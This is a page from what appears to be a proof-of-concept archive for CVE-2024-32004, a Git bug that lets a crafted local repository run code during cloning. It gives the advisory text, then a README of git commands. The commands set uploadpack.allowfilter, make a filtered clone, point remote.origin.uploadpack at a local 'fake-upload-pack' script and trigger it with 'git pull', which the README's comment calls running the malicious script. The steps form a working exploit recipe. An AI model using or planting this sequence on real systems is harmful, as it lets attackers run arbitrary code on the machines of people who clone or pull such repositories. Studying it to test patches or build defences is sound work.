Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2024-32004 PoC — Git vulnerable to Remote Code Execution while cloning special-crafted local repositories

Source
Associated Vulnerability
Title:Git vulnerable to Remote Code Execution while cloning special-crafted local repositories (CVE-2024-32004)
Description:Git is a revision control system. Prior to versions 2.45.1, 2.44.1, 2.43.4, 2.42.2, 2.41.1, 2.40.2, and 2.39.4, an attacker can prepare a local repository in such a way that, when cloned, will execute arbitrary code during the operation. The problem has been patched in versions 2.45.1, 2.44.1, 2.43.4, 2.42.2, 2.41.1, 2.40.2, and 2.39.4. As a workaround, avoid cloning repositories from untrusted sources.
Readme
# 创建 tmp 仓库,设置uploadpack.allowfilter为true
git init tmp

git -C tmp config uploadpack.allowfilter 1

# 从 tmp 仓库 克隆 evil
git clone --filter=blob:none --no-local --no-checkout tmp evil

rm -rf tmp

# 配置远程过滤脚本
git -C evil config remote.origin.uploadpack "./fake-upload-pack"

# 执行恶意脚本
git pull
File Snapshot

[4.0K] /data/pocs/696506fe61979b9f8997c87f62a5b6dff279ac88 ├── [ 18] fake-upload-pack └── [ 344] README.md 0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →